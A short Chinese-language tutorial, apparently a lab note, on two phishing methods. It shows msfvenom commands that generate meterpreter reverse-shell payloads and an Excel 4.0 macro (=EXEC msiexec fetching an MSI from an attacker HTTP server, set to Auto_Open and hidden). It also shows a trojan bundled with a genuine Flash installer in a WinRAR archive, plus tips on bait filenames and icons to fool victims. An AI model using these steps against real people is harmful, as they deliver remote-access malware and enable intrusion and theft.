1、制作excel宏
msf生成恶意的msi文件
msfvenom -p windows/x64/meterpreter/reverse_tcp lhsot=kali的ip lport=监听的端口 -f msi -o diaoyexl.msi
然后msf建立监听
然后python在具有恶意的msi的文件夹下开启http服务
然后开始制作excel
这里改一个更加容易让受害者相信的文件名
加点内容更容易上钩
选择插入宏表
选择插入宏表
=EXEC("msiexec /q /i http://192.168.100.132/diaoyexl.msi")
在A1 左上角改成Auto_Open让exl打开时候自动运行宏,然后回车
然后隐藏宏
另存为启用宏的工作表
保存成功后上传到肉鸡 win7虚拟机
运行后启用宏
成功上线
2、常规软件捆绑远控木马进行钓鱼
制作msf木马
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=kali的ip LPORT=监听端口 -f exe -o flash.exe
把木马和正常的flash 进行压缩
放在一起用winrar添加到压缩文件
这里解压前运行的是恶意远控木马,解压后运行的是正常的flash程序
为了逼真也可以修改图标
启动msf进行监听
然后把做好的恶意flash放到win7虚拟机中运行
点击安装后就会上线了
成功执行命令
过一段时间就会运行正常的flash安装页面